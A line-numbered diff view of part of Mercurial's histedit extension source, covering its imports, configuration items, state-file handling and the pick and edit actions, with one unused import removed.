180 dropmissing = True
180 dropmissing = True
181
181
182 By default, histedit will close the transaction after each action. For
182 By default, histedit will close the transaction after each action. For
183 performance purposes, you can configure histedit to use a single transaction
183 performance purposes, you can configure histedit to use a single transaction
184 across the entire histedit. WARNING: This setting introduces a significant risk
184 across the entire histedit. WARNING: This setting introduces a significant risk
185 of losing the work you've done in a histedit if the histedit aborts
185 of losing the work you've done in a histedit if the histedit aborts
186 unexpectedly::
186 unexpectedly::
187
187
188 [histedit]
188 [histedit]
189 singletransaction = True
189 singletransaction = True
190
190
191 """
191 """
192
192
193 from __future__ import absolute_import
193 from __future__ import absolute_import
194
194
195 # chistedit dependencies that are not available everywhere
195 # chistedit dependencies that are not available everywhere
196 try:
196 try:
197 import fcntl
197 import fcntl
198 import termios
198 import termios
199 except ImportError:
199 except ImportError:
200 fcntl = None
200 fcntl = None
201 termios = None
201 termios = None
202
202
203 import functools
203 import functools
204 import locale
205 import os
204 import os
206 import struct
205 import struct
207
206
208 from mercurial.i18n import _
207 from mercurial.i18n import _
209 from mercurial.pycompat import (
208 from mercurial.pycompat import (
210 getattr,
209 getattr,
211 open,
210 open,
212 )
211 )
213 from mercurial import (
212 from mercurial import (
214 bundle2,
213 bundle2,
215 cmdutil,
214 cmdutil,
216 context,
215 context,
217 copies,
216 copies,
218 destutil,
217 destutil,
219 discovery,
218 discovery,
220 encoding,
219 encoding,
221 error,
220 error,
222 exchange,
221 exchange,
223 extensions,
222 extensions,
224 hg,
223 hg,
225 logcmdutil,
224 logcmdutil,
226 merge as mergemod,
225 merge as mergemod,
227 mergestate as mergestatemod,
226 mergestate as mergestatemod,
228 mergeutil,
227 mergeutil,
229 node,
228 node,
230 obsolete,
229 obsolete,
231 pycompat,
230 pycompat,
232 registrar,
231 registrar,
233 repair,
232 repair,
234 rewriteutil,
233 rewriteutil,
235 scmutil,
234 scmutil,
236 state as statemod,
235 state as statemod,
237 util,
236 util,
238 )
237 )
239 from mercurial.utils import (
238 from mercurial.utils import (
240 dateutil,
239 dateutil,
241 stringutil,
240 stringutil,
242 )
241 )
243
242
244 pickle = util.pickle
243 pickle = util.pickle
245 cmdtable = {}
244 cmdtable = {}
246 command = registrar.command(cmdtable)
245 command = registrar.command(cmdtable)
247
246
248 configtable = {}
247 configtable = {}
249 configitem = registrar.configitem(configtable)
248 configitem = registrar.configitem(configtable)
250 configitem(
249 configitem(
251 b'experimental', b'histedit.autoverb', default=False,
250 b'experimental', b'histedit.autoverb', default=False,
252 )
251 )
253 configitem(
252 configitem(
254 b'histedit', b'defaultrev', default=None,
253 b'histedit', b'defaultrev', default=None,
255 )
254 )
256 configitem(
255 configitem(
257 b'histedit', b'dropmissing', default=False,
256 b'histedit', b'dropmissing', default=False,
258 )
257 )
259 configitem(
258 configitem(
260 b'histedit', b'linelen', default=80,
259 b'histedit', b'linelen', default=80,
261 )
260 )
262 configitem(
261 configitem(
263 b'histedit', b'singletransaction', default=False,
262 b'histedit', b'singletransaction', default=False,
264 )
263 )
265 configitem(
264 configitem(
266 b'ui', b'interface.histedit', default=None,
265 b'ui', b'interface.histedit', default=None,
267 )
266 )
268 configitem(b'histedit', b'summary-template', default=b'{rev} {desc|firstline}')
267 configitem(b'histedit', b'summary-template', default=b'{rev} {desc|firstline}')
269
268
270 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
269 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
271 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
270 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
272 # be specifying the version(s) of Mercurial they are tested with, or
271 # be specifying the version(s) of Mercurial they are tested with, or
273 # leave the attribute unspecified.
272 # leave the attribute unspecified.
274 testedwith = b'ships-with-hg-core'
273 testedwith = b'ships-with-hg-core'
275
274
276 actiontable = {}
275 actiontable = {}
277 primaryactions = set()
276 primaryactions = set()
278 secondaryactions = set()
277 secondaryactions = set()
279 tertiaryactions = set()
278 tertiaryactions = set()
280 internalactions = set()
279 internalactions = set()
281
280
282
281
283 def geteditcomment(ui, first, last):
282 def geteditcomment(ui, first, last):
284 """ construct the editor comment
283 """ construct the editor comment
285 The comment includes::
284 The comment includes::
286 - an intro
285 - an intro
287 - sorted primary commands
286 - sorted primary commands
288 - sorted short commands
287 - sorted short commands
289 - sorted long commands
288 - sorted long commands
290 - additional hints
289 - additional hints
291
290
292 Commands are only included once.
291 Commands are only included once.
293 """
292 """
294 intro = _(
293 intro = _(
295 b"""Edit history between %s and %s
294 b"""Edit history between %s and %s
296
295
297 Commits are listed from least to most recent
296 Commits are listed from least to most recent
298
297
299 You can reorder changesets by reordering the lines
298 You can reorder changesets by reordering the lines
300
299
301 Commands:
300 Commands:
302 """
301 """
303 )
302 )
304 actions = []
303 actions = []
305
304
306 def addverb(v):
305 def addverb(v):
307 a = actiontable[v]
306 a = actiontable[v]
308 lines = a.message.split(b"\n")
307 lines = a.message.split(b"\n")
309 if len(a.verbs):
308 if len(a.verbs):
310 v = b', '.join(sorted(a.verbs, key=lambda v: len(v)))
309 v = b', '.join(sorted(a.verbs, key=lambda v: len(v)))
311 actions.append(b" %s = %s" % (v, lines[0]))
310 actions.append(b" %s = %s" % (v, lines[0]))
312 actions.extend([b' %s'] * (len(lines) - 1))
311 actions.extend([b' %s'] * (len(lines) - 1))
313
312
314 for v in (
313 for v in (
315 sorted(primaryactions)
314 sorted(primaryactions)
316 + sorted(secondaryactions)
315 + sorted(secondaryactions)
317 + sorted(tertiaryactions)
316 + sorted(tertiaryactions)
318 ):
317 ):
319 addverb(v)
318 addverb(v)
320 actions.append(b'')
319 actions.append(b'')
321
320
322 hints = []
321 hints = []
323 if ui.configbool(b'histedit', b'dropmissing'):
322 if ui.configbool(b'histedit', b'dropmissing'):
324 hints.append(
323 hints.append(
325 b"Deleting a changeset from the list "
324 b"Deleting a changeset from the list "
326 b"will DISCARD it from the edited history!"
325 b"will DISCARD it from the edited history!"
327 )
326 )
328
327
329 lines = (intro % (first, last)).split(b'\n') + actions + hints
328 lines = (intro % (first, last)).split(b'\n') + actions + hints
330
329
331 return b''.join([b'# %s\n' % l if l else b'#\n' for l in lines])
330 return b''.join([b'# %s\n' % l if l else b'#\n' for l in lines])
332
331
333
332
334 class histeditstate(object):
333 class histeditstate(object):
335 def __init__(self, repo):
334 def __init__(self, repo):
336 self.repo = repo
335 self.repo = repo
337 self.actions = None
336 self.actions = None
338 self.keep = None
337 self.keep = None
339 self.topmost = None
338 self.topmost = None
340 self.parentctxnode = None
339 self.parentctxnode = None
341 self.lock = None
340 self.lock = None
342 self.wlock = None
341 self.wlock = None
343 self.backupfile = None
342 self.backupfile = None
344 self.stateobj = statemod.cmdstate(repo, b'histedit-state')
343 self.stateobj = statemod.cmdstate(repo, b'histedit-state')
345 self.replacements = []
344 self.replacements = []
346
345
347 def read(self):
346 def read(self):
348 """Load histedit state from disk and set fields appropriately."""
347 """Load histedit state from disk and set fields appropriately."""
349 if not self.stateobj.exists():
348 if not self.stateobj.exists():
350 cmdutil.wrongtooltocontinue(self.repo, _(b'histedit'))
349 cmdutil.wrongtooltocontinue(self.repo, _(b'histedit'))
351
350
352 data = self._read()
351 data = self._read()
353
352
354 self.parentctxnode = data[b'parentctxnode']
353 self.parentctxnode = data[b'parentctxnode']
355 actions = parserules(data[b'rules'], self)
354 actions = parserules(data[b'rules'], self)
356 self.actions = actions
355 self.actions = actions
357 self.keep = data[b'keep']
356 self.keep = data[b'keep']
358 self.topmost = data[b'topmost']
357 self.topmost = data[b'topmost']
359 self.replacements = data[b'replacements']
358 self.replacements = data[b'replacements']
360 self.backupfile = data[b'backupfile']
359 self.backupfile = data[b'backupfile']
361
360
362 def _read(self):
361 def _read(self):
363 fp = self.repo.vfs.read(b'histedit-state')
362 fp = self.repo.vfs.read(b'histedit-state')
364 if fp.startswith(b'v1\n'):
363 if fp.startswith(b'v1\n'):
365 data = self._load()
364 data = self._load()
366 parentctxnode, rules, keep, topmost, replacements, backupfile = data
365 parentctxnode, rules, keep, topmost, replacements, backupfile = data
367 else:
366 else:
368 data = pickle.loads(fp)
367 data = pickle.loads(fp)
369 parentctxnode, rules, keep, topmost, replacements = data
368 parentctxnode, rules, keep, topmost, replacements = data
370 backupfile = None
369 backupfile = None
371 rules = b"\n".join([b"%s %s" % (verb, rest) for [verb, rest] in rules])
370 rules = b"\n".join([b"%s %s" % (verb, rest) for [verb, rest] in rules])
372
371
373 return {
372 return {
374 b'parentctxnode': parentctxnode,
373 b'parentctxnode': parentctxnode,
375 b"rules": rules,
374 b"rules": rules,
376 b"keep": keep,
375 b"keep": keep,
377 b"topmost": topmost,
376 b"topmost": topmost,
378 b"replacements": replacements,
377 b"replacements": replacements,
379 b"backupfile": backupfile,
378 b"backupfile": backupfile,
380 }
379 }
381
380
382 def write(self, tr=None):
381 def write(self, tr=None):
383 if tr:
382 if tr:
384 tr.addfilegenerator(
383 tr.addfilegenerator(
385 b'histedit-state',
384 b'histedit-state',
386 (b'histedit-state',),
385 (b'histedit-state',),
387 self._write,
386 self._write,
388 location=b'plain',
387 location=b'plain',
389 )
388 )
390 else:
389 else:
391 with self.repo.vfs(b"histedit-state", b"w") as f:
390 with self.repo.vfs(b"histedit-state", b"w") as f:
392 self._write(f)
391 self._write(f)
393
392
394 def _write(self, fp):
393 def _write(self, fp):
395 fp.write(b'v1\n')
394 fp.write(b'v1\n')
396 fp.write(b'%s\n' % node.hex(self.parentctxnode))
395 fp.write(b'%s\n' % node.hex(self.parentctxnode))
397 fp.write(b'%s\n' % node.hex(self.topmost))
396 fp.write(b'%s\n' % node.hex(self.topmost))
398 fp.write(b'%s\n' % (b'True' if self.keep else b'False'))
397 fp.write(b'%s\n' % (b'True' if self.keep else b'False'))
399 fp.write(b'%d\n' % len(self.actions))
398 fp.write(b'%d\n' % len(self.actions))
400 for action in self.actions:
399 for action in self.actions:
401 fp.write(b'%s\n' % action.tostate())
400 fp.write(b'%s\n' % action.tostate())
402 fp.write(b'%d\n' % len(self.replacements))
401 fp.write(b'%d\n' % len(self.replacements))
403 for replacement in self.replacements:
402 for replacement in self.replacements:
404 fp.write(
403 fp.write(
405 b'%s%s\n'
404 b'%s%s\n'
406 % (
405 % (
407 node.hex(replacement[0]),
406 node.hex(replacement[0]),
408 b''.join(node.hex(r) for r in replacement[1]),
407 b''.join(node.hex(r) for r in replacement[1]),
409 )
408 )
410 )
409 )
411 backupfile = self.backupfile
410 backupfile = self.backupfile
412 if not backupfile:
411 if not backupfile:
413 backupfile = b''
412 backupfile = b''
414 fp.write(b'%s\n' % backupfile)
413 fp.write(b'%s\n' % backupfile)
415
414
416 def _load(self):
415 def _load(self):
417 fp = self.repo.vfs(b'histedit-state', b'r')
416 fp = self.repo.vfs(b'histedit-state', b'r')
418 lines = [l[:-1] for l in fp.readlines()]
417 lines = [l[:-1] for l in fp.readlines()]
419
418
420 index = 0
419 index = 0
421 lines[index] # version number
420 lines[index] # version number
422 index += 1
421 index += 1
423
422
424 parentctxnode = node.bin(lines[index])
423 parentctxnode = node.bin(lines[index])
425 index += 1
424 index += 1
426
425
427 topmost = node.bin(lines[index])
426 topmost = node.bin(lines[index])
428 index += 1
427 index += 1
429
428
430 keep = lines[index] == b'True'
429 keep = lines[index] == b'True'
431 index += 1
430 index += 1
432
431
433 # Rules
432 # Rules
434 rules = []
433 rules = []
435 rulelen = int(lines[index])
434 rulelen = int(lines[index])
436 index += 1
435 index += 1
437 for i in pycompat.xrange(rulelen):
436 for i in pycompat.xrange(rulelen):
438 ruleaction = lines[index]
437 ruleaction = lines[index]
439 index += 1
438 index += 1
440 rule = lines[index]
439 rule = lines[index]
441 index += 1
440 index += 1
442 rules.append((ruleaction, rule))
441 rules.append((ruleaction, rule))
443
442
444 # Replacements
443 # Replacements
445 replacements = []
444 replacements = []
446 replacementlen = int(lines[index])
445 replacementlen = int(lines[index])
447 index += 1
446 index += 1
448 for i in pycompat.xrange(replacementlen):
447 for i in pycompat.xrange(replacementlen):
449 replacement = lines[index]
448 replacement = lines[index]
450 original = node.bin(replacement[:40])
449 original = node.bin(replacement[:40])
451 succ = [
450 succ = [
452 node.bin(replacement[i : i + 40])
451 node.bin(replacement[i : i + 40])
453 for i in range(40, len(replacement), 40)
452 for i in range(40, len(replacement), 40)
454 ]
453 ]
455 replacements.append((original, succ))
454 replacements.append((original, succ))
456 index += 1
455 index += 1
457
456
458 backupfile = lines[index]
457 backupfile = lines[index]
459 index += 1
458 index += 1
460
459
461 fp.close()
460 fp.close()
462
461
463 return parentctxnode, rules, keep, topmost, replacements, backupfile
462 return parentctxnode, rules, keep, topmost, replacements, backupfile
464
463
465 def clear(self):
464 def clear(self):
466 if self.inprogress():
465 if self.inprogress():
467 self.repo.vfs.unlink(b'histedit-state')
466 self.repo.vfs.unlink(b'histedit-state')
468
467
469 def inprogress(self):
468 def inprogress(self):
470 return self.repo.vfs.exists(b'histedit-state')
469 return self.repo.vfs.exists(b'histedit-state')
471
470
472
471
473 class histeditaction(object):
472 class histeditaction(object):
474 def __init__(self, state, node):
473 def __init__(self, state, node):
475 self.state = state
474 self.state = state
476 self.repo = state.repo
475 self.repo = state.repo
477 self.node = node
476 self.node = node
478
477
479 @classmethod
478 @classmethod
480 def fromrule(cls, state, rule):
479 def fromrule(cls, state, rule):
481 """Parses the given rule, returning an instance of the histeditaction.
480 """Parses the given rule, returning an instance of the histeditaction.
482 """
481 """
483 ruleid = rule.strip().split(b' ', 1)[0]
482 ruleid = rule.strip().split(b' ', 1)[0]
484 # ruleid can be anything from rev numbers, hashes, "bookmarks" etc
483 # ruleid can be anything from rev numbers, hashes, "bookmarks" etc
485 # Check for validation of rule ids and get the rulehash
484 # Check for validation of rule ids and get the rulehash
486 try:
485 try:
487 rev = node.bin(ruleid)
486 rev = node.bin(ruleid)
488 except TypeError:
487 except TypeError:
489 try:
488 try:
490 _ctx = scmutil.revsingle(state.repo, ruleid)
489 _ctx = scmutil.revsingle(state.repo, ruleid)
491 rulehash = _ctx.hex()
490 rulehash = _ctx.hex()
492 rev = node.bin(rulehash)
491 rev = node.bin(rulehash)
493 except error.RepoLookupError:
492 except error.RepoLookupError:
494 raise error.ParseError(_(b"invalid changeset %s") % ruleid)
493 raise error.ParseError(_(b"invalid changeset %s") % ruleid)
495 return cls(state, rev)
494 return cls(state, rev)
496
495
497 def verify(self, prev, expected, seen):
496 def verify(self, prev, expected, seen):
498 """ Verifies semantic correctness of the rule"""
497 """ Verifies semantic correctness of the rule"""
499 repo = self.repo
498 repo = self.repo
500 ha = node.hex(self.node)
499 ha = node.hex(self.node)
501 self.node = scmutil.resolvehexnodeidprefix(repo, ha)
500 self.node = scmutil.resolvehexnodeidprefix(repo, ha)
502 if self.node is None:
501 if self.node is None:
503 raise error.ParseError(_(b'unknown changeset %s listed') % ha[:12])
502 raise error.ParseError(_(b'unknown changeset %s listed') % ha[:12])
504 self._verifynodeconstraints(prev, expected, seen)
503 self._verifynodeconstraints(prev, expected, seen)
505
504
506 def _verifynodeconstraints(self, prev, expected, seen):
505 def _verifynodeconstraints(self, prev, expected, seen):
507 # by default command need a node in the edited list
506 # by default command need a node in the edited list
508 if self.node not in expected:
507 if self.node not in expected:
509 raise error.ParseError(
508 raise error.ParseError(
510 _(b'%s "%s" changeset was not a candidate')
509 _(b'%s "%s" changeset was not a candidate')
511 % (self.verb, node.short(self.node)),
510 % (self.verb, node.short(self.node)),
512 hint=_(b'only use listed changesets'),
511 hint=_(b'only use listed changesets'),
513 )
512 )
514 # and only one command per node
513 # and only one command per node
515 if self.node in seen:
514 if self.node in seen:
516 raise error.ParseError(
515 raise error.ParseError(
517 _(b'duplicated command for changeset %s')
516 _(b'duplicated command for changeset %s')
518 % node.short(self.node)
517 % node.short(self.node)
519 )
518 )
520
519
521 def torule(self):
520 def torule(self):
522 """build a histedit rule line for an action
521 """build a histedit rule line for an action
523
522
524 by default lines are in the form:
523 by default lines are in the form:
525 <hash> <rev> <summary>
524 <hash> <rev> <summary>
526 """
525 """
527 ctx = self.repo[self.node]
526 ctx = self.repo[self.node]
528 ui = self.repo.ui
527 ui = self.repo.ui
529 summary = (
528 summary = (
530 cmdutil.rendertemplate(
529 cmdutil.rendertemplate(
531 ctx, ui.config(b'histedit', b'summary-template')
530 ctx, ui.config(b'histedit', b'summary-template')
532 )
531 )
533 or b''
532 or b''
534 )
533 )
535 summary = summary.splitlines()[0]
534 summary = summary.splitlines()[0]
536 line = b'%s %s %s' % (self.verb, ctx, summary)
535 line = b'%s %s %s' % (self.verb, ctx, summary)
537 # trim to 75 columns by default so it's not stupidly wide in my editor
536 # trim to 75 columns by default so it's not stupidly wide in my editor
538 # (the 5 more are left for verb)
537 # (the 5 more are left for verb)
539 maxlen = self.repo.ui.configint(b'histedit', b'linelen')
538 maxlen = self.repo.ui.configint(b'histedit', b'linelen')
540 maxlen = max(maxlen, 22) # avoid truncating hash
539 maxlen = max(maxlen, 22) # avoid truncating hash
541 return stringutil.ellipsis(line, maxlen)
540 return stringutil.ellipsis(line, maxlen)
542
541
543 def tostate(self):
542 def tostate(self):
544 """Print an action in format used by histedit state files
543 """Print an action in format used by histedit state files
545 (the first line is a verb, the remainder is the second)
544 (the first line is a verb, the remainder is the second)
546 """
545 """
547 return b"%s\n%s" % (self.verb, node.hex(self.node))
546 return b"%s\n%s" % (self.verb, node.hex(self.node))
548
547
549 def run(self):
548 def run(self):
550 """Runs the action. The default behavior is simply apply the action's
549 """Runs the action. The default behavior is simply apply the action's
551 rulectx onto the current parentctx."""
550 rulectx onto the current parentctx."""
552 self.applychange()
551 self.applychange()
553 self.continuedirty()
552 self.continuedirty()
554 return self.continueclean()
553 return self.continueclean()
555
554
556 def applychange(self):
555 def applychange(self):
557 """Applies the changes from this action's rulectx onto the current
556 """Applies the changes from this action's rulectx onto the current
558 parentctx, but does not commit them."""
557 parentctx, but does not commit them."""
559 repo = self.repo
558 repo = self.repo
560 rulectx = repo[self.node]
559 rulectx = repo[self.node]
561 repo.ui.pushbuffer(error=True, labeled=True)
560 repo.ui.pushbuffer(error=True, labeled=True)
562 hg.update(repo, self.state.parentctxnode, quietempty=True)
561 hg.update(repo, self.state.parentctxnode, quietempty=True)
563 repo.ui.popbuffer()
562 repo.ui.popbuffer()
564 stats = applychanges(repo.ui, repo, rulectx, {})
563 stats = applychanges(repo.ui, repo, rulectx, {})
565 repo.dirstate.setbranch(rulectx.branch())
564 repo.dirstate.setbranch(rulectx.branch())
566 if stats.unresolvedcount:
565 if stats.unresolvedcount:
567 raise error.InterventionRequired(
566 raise error.InterventionRequired(
568 _(b'Fix up the change (%s %s)')
567 _(b'Fix up the change (%s %s)')
569 % (self.verb, node.short(self.node)),
568 % (self.verb, node.short(self.node)),
570 hint=_(b'hg histedit --continue to resume'),
569 hint=_(b'hg histedit --continue to resume'),
571 )
570 )
572
571
573 def continuedirty(self):
572 def continuedirty(self):
574 """Continues the action when changes have been applied to the working
573 """Continues the action when changes have been applied to the working
575 copy. The default behavior is to commit the dirty changes."""
574 copy. The default behavior is to commit the dirty changes."""
576 repo = self.repo
575 repo = self.repo
577 rulectx = repo[self.node]
576 rulectx = repo[self.node]
578
577
579 editor = self.commiteditor()
578 editor = self.commiteditor()
580 commit = commitfuncfor(repo, rulectx)
579 commit = commitfuncfor(repo, rulectx)
581 if repo.ui.configbool(b'rewrite', b'update-timestamp'):
580 if repo.ui.configbool(b'rewrite', b'update-timestamp'):
582 date = dateutil.makedate()
581 date = dateutil.makedate()
583 else:
582 else:
584 date = rulectx.date()
583 date = rulectx.date()
585 commit(
584 commit(
586 text=rulectx.description(),
585 text=rulectx.description(),
587 user=rulectx.user(),
586 user=rulectx.user(),
588 date=date,
587 date=date,
589 extra=rulectx.extra(),
588 extra=rulectx.extra(),
590 editor=editor,
589 editor=editor,
591 )
590 )
592
591
593 def commiteditor(self):
592 def commiteditor(self):
594 """The editor to be used to edit the commit message."""
593 """The editor to be used to edit the commit message."""
595 return False
594 return False
596
595
597 def continueclean(self):
596 def continueclean(self):
598 """Continues the action when the working copy is clean. The default
597 """Continues the action when the working copy is clean. The default
599 behavior is to accept the current commit as the new version of the
598 behavior is to accept the current commit as the new version of the
600 rulectx."""
599 rulectx."""
601 ctx = self.repo[b'.']
600 ctx = self.repo[b'.']
602 if ctx.node() == self.state.parentctxnode:
601 if ctx.node() == self.state.parentctxnode:
603 self.repo.ui.warn(
602 self.repo.ui.warn(
604 _(b'%s: skipping changeset (no changes)\n')
603 _(b'%s: skipping changeset (no changes)\n')
605 % node.short(self.node)
604 % node.short(self.node)
606 )
605 )
607 return ctx, [(self.node, tuple())]
606 return ctx, [(self.node, tuple())]
608 if ctx.node() == self.node:
607 if ctx.node() == self.node:
609 # Nothing changed
608 # Nothing changed
610 return ctx, []
609 return ctx, []
611 return ctx, [(self.node, (ctx.node(),))]
610 return ctx, [(self.node, (ctx.node(),))]
612
611
613
612
614 def commitfuncfor(repo, src):
613 def commitfuncfor(repo, src):
615 """Build a commit function for the replacement of <src>
614 """Build a commit function for the replacement of <src>
616
615
617 This function ensure we apply the same treatment to all changesets.
616 This function ensure we apply the same treatment to all changesets.
618
617
619 - Add a 'histedit_source' entry in extra.
618 - Add a 'histedit_source' entry in extra.
620
619
621 Note that fold has its own separated logic because its handling is a bit
620 Note that fold has its own separated logic because its handling is a bit
622 different and not easily factored out of the fold method.
621 different and not easily factored out of the fold method.
623 """
622 """
624 phasemin = src.phase()
623 phasemin = src.phase()
625
624
626 def commitfunc(**kwargs):
625 def commitfunc(**kwargs):
627 overrides = {(b'phases', b'new-commit'): phasemin}
626 overrides = {(b'phases', b'new-commit'): phasemin}
628 with repo.ui.configoverride(overrides, b'histedit'):
627 with repo.ui.configoverride(overrides, b'histedit'):
629 extra = kwargs.get('extra', {}).copy()
628 extra = kwargs.get('extra', {}).copy()
630 extra[b'histedit_source'] = src.hex()
629 extra[b'histedit_source'] = src.hex()
631 kwargs['extra'] = extra
630 kwargs['extra'] = extra
632 return repo.commit(**kwargs)
631 return repo.commit(**kwargs)
633
632
634 return commitfunc
633 return commitfunc
635
634
636
635
637 def applychanges(ui, repo, ctx, opts):
636 def applychanges(ui, repo, ctx, opts):
638 """Merge changeset from ctx (only) in the current working directory"""
637 """Merge changeset from ctx (only) in the current working directory"""
639 wcpar = repo.dirstate.p1()
638 wcpar = repo.dirstate.p1()
640 if ctx.p1().node() == wcpar:
639 if ctx.p1().node() == wcpar:
641 # edits are "in place" we do not need to make any merge,
640 # edits are "in place" we do not need to make any merge,
642 # just applies changes on parent for editing
641 # just applies changes on parent for editing
643 ui.pushbuffer()
642 ui.pushbuffer()
644 cmdutil.revert(ui, repo, ctx, (wcpar, node.nullid), all=True)
643 cmdutil.revert(ui, repo, ctx, (wcpar, node.nullid), all=True)
645 stats = mergemod.updateresult(0, 0, 0, 0)
644 stats = mergemod.updateresult(0, 0, 0, 0)
646 ui.popbuffer()
645 ui.popbuffer()
647 else:
646 else:
648 try:
647 try:
649 # ui.forcemerge is an internal variable, do not document
648 # ui.forcemerge is an internal variable, do not document
650 repo.ui.setconfig(
649 repo.ui.setconfig(
651 b'ui', b'forcemerge', opts.get(b'tool', b''), b'histedit'
650 b'ui', b'forcemerge', opts.get(b'tool', b''), b'histedit'
652 )
651 )
653 stats = mergemod.graft(repo, ctx, labels=[b'local', b'histedit'])
652 stats = mergemod.graft(repo, ctx, labels=[b'local', b'histedit'])
654 finally:
653 finally:
655 repo.ui.setconfig(b'ui', b'forcemerge', b'', b'histedit')
654 repo.ui.setconfig(b'ui', b'forcemerge', b'', b'histedit')
656 return stats
655 return stats
657
656
658
657
659 def collapse(repo, firstctx, lastctx, commitopts, skipprompt=False):
658 def collapse(repo, firstctx, lastctx, commitopts, skipprompt=False):
660 """collapse the set of revisions from first to last as new one.
659 """collapse the set of revisions from first to last as new one.
661
660
662 Expected commit options are:
661 Expected commit options are:
663 - message
662 - message
664 - date
663 - date
665 - username
664 - username
666 Commit message is edited in all cases.
665 Commit message is edited in all cases.
667
666
668 This function works in memory."""
667 This function works in memory."""
669 ctxs = list(repo.set(b'%d::%d', firstctx.rev(), lastctx.rev()))
668 ctxs = list(repo.set(b'%d::%d', firstctx.rev(), lastctx.rev()))
670 if not ctxs:
669 if not ctxs:
671 return None
670 return None
672 for c in ctxs:
671 for c in ctxs:
673 if not c.mutable():
672 if not c.mutable():
674 raise error.ParseError(
673 raise error.ParseError(
675 _(b"cannot fold into public change %s") % node.short(c.node())
674 _(b"cannot fold into public change %s") % node.short(c.node())
676 )
675 )
677 base = firstctx.p1()
676 base = firstctx.p1()
678
677
679 # commit a new version of the old changeset, including the update
678 # commit a new version of the old changeset, including the update
680 # collect all files which might be affected
679 # collect all files which might be affected
681 files = set()
680 files = set()
682 for ctx in ctxs:
681 for ctx in ctxs:
683 files.update(ctx.files())
682 files.update(ctx.files())
684
683
685 # Recompute copies (avoid recording a -> b -> a)
684 # Recompute copies (avoid recording a -> b -> a)
686 copied = copies.pathcopies(base, lastctx)
685 copied = copies.pathcopies(base, lastctx)
687
686
688 # prune files which were reverted by the updates
687 # prune files which were reverted by the updates
689 files = [f for f in files if not cmdutil.samefile(f, lastctx, base)]
688 files = [f for f in files if not cmdutil.samefile(f, lastctx, base)]
690 # commit version of these files as defined by head
689 # commit version of these files as defined by head
691 headmf = lastctx.manifest()
690 headmf = lastctx.manifest()
692
691
693 def filectxfn(repo, ctx, path):
692 def filectxfn(repo, ctx, path):
694 if path in headmf:
693 if path in headmf:
695 fctx = lastctx[path]
694 fctx = lastctx[path]
696 flags = fctx.flags()
695 flags = fctx.flags()
697 mctx = context.memfilectx(
696 mctx = context.memfilectx(
698 repo,
697 repo,
699 ctx,
698 ctx,
700 fctx.path(),
699 fctx.path(),
701 fctx.data(),
700 fctx.data(),
702 islink=b'l' in flags,
701 islink=b'l' in flags,
703 isexec=b'x' in flags,
702 isexec=b'x' in flags,
704 copysource=copied.get(path),
703 copysource=copied.get(path),
705 )
704 )
706 return mctx
705 return mctx
707 return None
706 return None
708
707
709 if commitopts.get(b'message'):
708 if commitopts.get(b'message'):
710 message = commitopts[b'message']
709 message = commitopts[b'message']
711 else:
710 else:
712 message = firstctx.description()
711 message = firstctx.description()
713 user = commitopts.get(b'user')
712 user = commitopts.get(b'user')
714 date = commitopts.get(b'date')
713 date = commitopts.get(b'date')
715 extra = commitopts.get(b'extra')
714 extra = commitopts.get(b'extra')
716
715
717 parents = (firstctx.p1().node(), firstctx.p2().node())
716 parents = (firstctx.p1().node(), firstctx.p2().node())
718 editor = None
717 editor = None
719 if not skipprompt:
718 if not skipprompt:
720 editor = cmdutil.getcommiteditor(edit=True, editform=b'histedit.fold')
719 editor = cmdutil.getcommiteditor(edit=True, editform=b'histedit.fold')
721 new = context.memctx(
720 new = context.memctx(
722 repo,
721 repo,
723 parents=parents,
722 parents=parents,
724 text=message,
723 text=message,
725 files=files,
724 files=files,
726 filectxfn=filectxfn,
725 filectxfn=filectxfn,
727 user=user,
726 user=user,
728 date=date,
727 date=date,
729 extra=extra,
728 extra=extra,
730 editor=editor,
729 editor=editor,
731 )
730 )
732 return repo.commitctx(new)
731 return repo.commitctx(new)
733
732
734
733
735 def _isdirtywc(repo):
734 def _isdirtywc(repo):
736 return repo[None].dirty(missing=True)
735 return repo[None].dirty(missing=True)
737
736
738
737
739 def abortdirty():
738 def abortdirty():
740 raise error.Abort(
739 raise error.Abort(
741 _(b'working copy has pending changes'),
740 _(b'working copy has pending changes'),
742 hint=_(
741 hint=_(
743 b'amend, commit, or revert them and run histedit '
742 b'amend, commit, or revert them and run histedit '
744 b'--continue, or abort with histedit --abort'
743 b'--continue, or abort with histedit --abort'
745 ),
744 ),
746 )
745 )
747
746
748
747
749 def action(verbs, message, priority=False, internal=False):
748 def action(verbs, message, priority=False, internal=False):
750 def wrap(cls):
749 def wrap(cls):
751 assert not priority or not internal
750 assert not priority or not internal
752 verb = verbs[0]
751 verb = verbs[0]
753 if priority:
752 if priority:
754 primaryactions.add(verb)
753 primaryactions.add(verb)
755 elif internal:
754 elif internal:
756 internalactions.add(verb)
755 internalactions.add(verb)
757 elif len(verbs) > 1:
756 elif len(verbs) > 1:
758 secondaryactions.add(verb)
757 secondaryactions.add(verb)
759 else:
758 else:
760 tertiaryactions.add(verb)
759 tertiaryactions.add(verb)
761
760
762 cls.verb = verb
761 cls.verb = verb
763 cls.verbs = verbs
762 cls.verbs = verbs
764 cls.message = message
763 cls.message = message
765 for verb in verbs:
764 for verb in verbs:
766 actiontable[verb] = cls
765 actiontable[verb] = cls
767 return cls
766 return cls
768
767
769 return wrap
768 return wrap
770
769
771
770
772 @action([b'pick', b'p'], _(b'use commit'), priority=True)
771 @action([b'pick', b'p'], _(b'use commit'), priority=True)
773 class pick(histeditaction):
772 class pick(histeditaction):
774 def run(self):
773 def run(self):
775 rulectx = self.repo[self.node]
774 rulectx = self.repo[self.node]
776 if rulectx.p1().node() == self.state.parentctxnode:
775 if rulectx.p1().node() == self.state.parentctxnode:
777 self.repo.ui.debug(b'node %s unchanged\n' % node.short(self.node))
776 self.repo.ui.debug(b'node %s unchanged\n' % node.short(self.node))
778 return rulectx, []
777 return rulectx, []
779
778
780 return super(pick, self).run()
779 return super(pick, self).run()
781
780
782
781
783 @action([b'edit', b'e'], _(b'use commit, but stop for amending'), priority=True)
782 @action([b'edit', b'e'], _(b'use commit, but stop for amending'), priority=True)
784 class edit(histeditaction):
783 class edit(histeditaction):
785 def run(self):
784 def run(self):
786 repo = self.repo
785 repo = self.repo
787 rulectx = repo[self.node]
786 rulectx = repo[self.node]
788 hg.update(repo, self.state.parentctxnode, quietempty=True)
